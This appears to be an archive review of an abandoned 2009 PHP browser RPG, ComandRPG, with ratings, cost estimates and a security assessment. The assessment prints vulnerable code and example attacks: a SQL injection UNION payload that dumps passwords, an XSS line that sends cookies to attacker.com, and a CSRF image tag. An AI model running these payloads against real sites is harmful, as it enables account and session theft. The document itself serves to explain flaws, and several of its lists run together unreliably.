Muster your squad and march into a World War II browser RPG built for quick, tactical showdowns. ComandRPG blends turn-based duels with gritty gear management—knife to Garand to Thompson—while you train attack, defense, and speed, manage fatigue, and climb the ranks across a war-torn campaign.
Between missions, stock up at the shop, trade letters through the field mail, and swap stories in chat. With streamlined systems, clear progression, and a focus on punchy battles, ComandRPG delivers a lean wartime experience where timing, loadout, and nerve decide the outcome.
Game Name: ComandRPG (also stylized as "Comand RPG")
Genre: WWII Military Combat RPG
Theme: World War II soldier simulator with equipment management and turn-based combat
License: GNU General Public License v2 (GPL v2) - Polish translation included
Version: 0.1 (early alpha/pre-release stage)
Copyright: © 2009 ComandRPG
Authors: Khulmar (primary), boosik01 (contributor)
Language: Polish (UTF-8 Polish collation for database, ISO-8859-1 for HTML)
Technology: PHP 5.x, MySQL 5.x (MyISAM engine), HTML 4.01 Transitional, inline CSS
Release Date: 2009 (based on copyright headers)
Distribution Status: Open-source project, incomplete development (version 0.1 indicates early abandonment)
| File Type | Count | Size (MB) | Purpose |
|---|---|---|---|
| Total | 59 files | 0.76 MB | Complete game package |
| *.php | 26 | 0.092 | Game logic, pages, combat system |
| *.jpg | 12 | 0.250 | Background images, graphics |
| *.htm | 8 | 0.001 | Empty security index files |
| *.gif | 7 | 0.003 | UI elements, icons |
| *.png | 3 | 0.004 | Interface graphics |
| *.sql | 1 | 0.005 | Database schema (mysql.sql) |
| *.txt | 1 | 0.021 | GPL v2 license (Polish translation) |
| *.css | 1 | 0.004 | Stylesheet (css/style.css) |
Analysis: Extremely lightweight game (under 1 MB total), indicating minimal content and early-stage development. The 26 PHP files suggest basic functionality only. Multiple empty index.htm files (8 total) show directory access protection attempts. GPL v2 license in Polish (341 lines) demonstrates commitment to open-source but suggests limited international distribution plans.
Database Schema (8 tables):
chat - Chat systemekwipunek (Equipment/Inventory)enemy - Enemy NPC definitionskonta (Accounts/Characters) - Primary player data tablemail - Private messaging systemnewsy (News) - Announcements systemsklep (Shop) - Item storePHP Architecture:
$_SESSION['login'] and $_SESSION['pass'] (plaintext password storage)getBasic($pid) method loading player data into $user->get arraymysql_* functionsCombat System Architecture:
(attack + weapon_bonus) - defense / rand(1,3)zmeczenie by 1, +1-3 XP gainedCore Game Loop:
tuti = 0) → redirects to tuti.php (tutorial page)stan=1)Signs of Development/Testing Activity:
Player Activity Assessment: MINIMAL TO NONE - The game appears to have been tested only by developers (chat activity), with no evidence of public release or player base.
Rating: 3/10 (Below Average - Early Alpha Quality)
Strengths:
Critical Weaknesses:
haslo field stores passwords in plaintext (security disaster)mysql_query("SELECT `login`, `haslo` FROM `konta` WHERE `login`='".htmlspecialchars($_POST['login'])."' AND `haslo`='".htmlspecialchars($_POST['haslo'])."'");
SQL Injection Vulnerabilities:
mysql_query("SELECT * FROM `enemy` WHERE `id`=".$_GET['enemy']);
mysql_query('SELECT * FROM `sklep` WHERE `id`='.$_GET['kup']);
htmlspecialchars() used (does NOT prevent SQL injection)mysql_query(), mysql_fetch_array(), mysql_num_rows() (removed in PHP 7.0+)echo '<p>'.$i->text.'</p>'; // News content
echo '<p>'.$item['nazwa'].'</p>'; // Item names
Session Security Flaws:
$_SESSION['pass'] (plaintext password in memory)ereg() function used (removed PHP 7.0): ereg("^[0-9]*$", $_GET['enemy'])get_magic_quotes_gpc() check for non-existent var_dumpa() functionCode Maturity: This is alpha-stage code with fundamental security flaws and incomplete features. The developers understood basic concepts (OOP, validation) but lacked security knowledge and abandoned the project before beta quality.
Innovation Rating: 4/10 (Low-Moderate)
Novel Elements:
stan field (0/1) allows inventory collection with single active weaponDerivative Elements:
Overall Innovation: Lower-middle tier. The fatigue mechanic and speed-based turn resolution show creative thinking, but the game is fundamentally a standard stat-based browser RPG with a WWII skin. The promised weather system (if implemented) would have been innovative, but it remains vaporware.
Security Assessment: CATASTROPHIC
This game has every major vulnerability from the 2009 era:
$_SESSION['pass'])Danger Level: EXTREME - Any deployment would be compromised within hours. Database would be dumped, all accounts stolen, site defaced.
Modern Viability: 1/5 (Essentially Zero)
Why This Game Cannot Be Used Today:
mysql_* functions (removed PHP 7.0, 2015)ereg() removed PHP 7.0, get_magic_quotes_gpc() removed PHP 7.4Modernization Cost Estimate:
| Task | Hours | Cost @ $75/hr |
|---|---|---|
| Database migration (mysqli/PDO) | 8 | $600 |
| Password hashing (bcrypt/Argon2) | 4 | $300 |
| SQL injection fixes (prepared statements) | 12 | $900 |
| XSS/CSRF protection | 8 | $600 |
| Session security overhaul | 4 | $300 |
| Content creation (enemies, weapons, story) | 40 | $3,000 |
| Weather system implementation | 16 | $1,200 |
| Testing & debugging | 16 | $1,200 |
| TOTAL | 108 hours | $8,100 |
However: Even with $8,100 investment, the resulting game would be a basic browser RPG with 2009-era gameplay and minimal content. The Polish-only language would limit market to ~38 million people. Return on investment: Negative.
Better Alternative: Build modern game from scratch using Laravel/React for $10,000-$15,000 with 2024 standards.
Historical Value:
This game is a time capsule of Polish indie game development in 2009:
gg field in user table references Polish IM service (dominant 2000s Poland, now obsolete)The game never progressed beyond alpha testing (43 chat messages, 0 players) and represents the high abandonment rate of amateur browser RPG projects in the late 2000s. The promise-versus-delivery gap (weather system advertised but not coded) shows classic feature creep and scope mismanagement.
Critical Vulnerabilities (2009 OWASP Top 10 violations):
// Vulnerable to SQL injection
$enemy = mysql_fetch_object(mysql_query("SELECT * FROM `enemy` WHERE `id`=".$_GET['enemy']));
// Attack: fight.php?enemy=1 OR 1=1
A2: Broken Authentication
// Plaintext password storage
CREATE TABLE `konta` (`haslo` varchar(100) NOT NULL default '');
// Password in session
$_SESSION['pass'] = htmlspecialchars($_POST['haslo']);
// No password hashing, no encryption
// User content echoed without encoding
echo '<p>'.$i->text.'</p>'; // News entries
echo '<p>'.$item['nazwa'].'</p>'; // Item names from database
// Attack: News entry with <script>alert(document.cookie)</script>
A8: CSRF (Cross-Site Request Forgery)
shop.php?kup=1fight.php?enemy=1Additional Vulnerabilities:
mysql_* removed PHP 7.0 (non-functional since 2015)ereg() removed PHP 7.0get_magic_quotes_gpc() removed PHP 7.4htmlspecialchars() used (insufficient)session_regenerate_id() after loginExploitation Scenarios:
SQL Injection → Database Dump:
GET /fight.php?enemy=1 UNION SELECT login,haslo,email,1,1,1,1 FROM konta--
Result: Dump all usernames, plaintext passwords, emails
XSS → Cookie Theft:
POST news entry: <script>fetch('http://attacker.com?c='+document.cookie)</script>
Result: Admin session stolen, site compromised
CSRF → Unauthorized Purchases:
<img src="http://victim.com/shop.php?kup=5"> embedded in external site
Result: Victim unknowingly purchases expensive weapon
Password Exposure:
For Historical/Academic Use Only:
If Attempting Modernization (Not Recommended):
mysql_* functions (8 hours)ereg() (use preg_match())Realistic Assessment: Modernization would cost $8,100+ and result in mediocre 2009-era browser RPG. Better to build new game from scratch using modern frameworks (Laravel + React/Vue) for similar investment with 2024 standards and scalability.
Preservation Value: Archive as example of:
Game Type: Early-alpha WWII soldier browser RPG with turn-based combat and fatigue mechanics
Development Status: Abandoned at version 0.1 (2009)
Completion Level: ~25% (core combat works, but minimal content, missing promised features)
Code Quality: 3/10 (functional core, catastrophic security, deprecated APIs)
Innovation: 4/10 (fatigue mechanic and speed-based turns show creativity)
Security: CATASTROPHIC (plaintext passwords, SQL injection, XSS, no CSRF protection)
Modern Viability: 1/5 (non-functional on PHP 7+, requires $8,100+ modernization for minimal return)
Historical Significance: Low-moderate (documents Polish indie game development, GPL adoption, Gadu-Gadu era)
Best Use Case Today: Educational study of 2009-era security vulnerabilities and abandoned indie project patterns. Should NOT be deployed under any circumstances.
Unique Characteristics:
Bottom Line: ComandRPG represents an ambitious but prematurely abandoned solo/duo project from 2009 Poland. The developers (Khulmar + boosik01) had some good ideas (fatigue system, speed-based combat) but lacked security expertise and likely ran out of motivation during alpha development. The game's 43 chat messages and 0 players tell the story of a project that never escaped internal testing. Modern deployment is impossible due to PHP 7+ incompatibility and catastrophic security flaws. Estimated modernization cost ($8,100) exceeds value of resulting product. Preserve as historical artifact only.
DO NOT DEPLOY THIS CODE - CATASTROPHIC SECURITY
ComandRPG stores passwords in plaintext, has SQL injection in every query, uses deprecated mysql_* functions (removed PHP 7.0), and lacks all modern security practices. The 43 chat messages and 0 players show it never left internal testing. This is a 2009 Polish alpha project (v0.1) abandoned before beta quality.
| Historical Value | ★★★☆☆ 3/5 - Polish indie game artifact (2009) |
|---|---|
| Code Quality | ★★★☆☆ 3/10 - Functional core, catastrophic security |
| Innovation | ★★★★☆ 4/10 - Fatigue + speed mechanics creative |
| Security | ☆☆☆☆☆ 0/5 - Plaintext passwords, SQL injection everywhere |
| Completeness | ★★☆☆☆ 25% - Version 0.1 alpha, missing features |
| Modern Viability | ★☆☆☆☆ 1/5 - PHP 7+ incompatible, minimal ROI |
| Cultural Significance | ★★★☆☆ 3/5 - Gadu-Gadu era, WWII theme |
| Overall Grade | D- Abandoned alpha with good ideas, catastrophic security |
Running many of the scripts in this archive on a live server presents a serious security risk. These projects were created before modern hardening practices and may contain vulnerabilities that can compromise your system.
We strongly recommend using this code for reference and analysis only, or in isolated local environments. By downloading these files, you accept full responsibility for their use.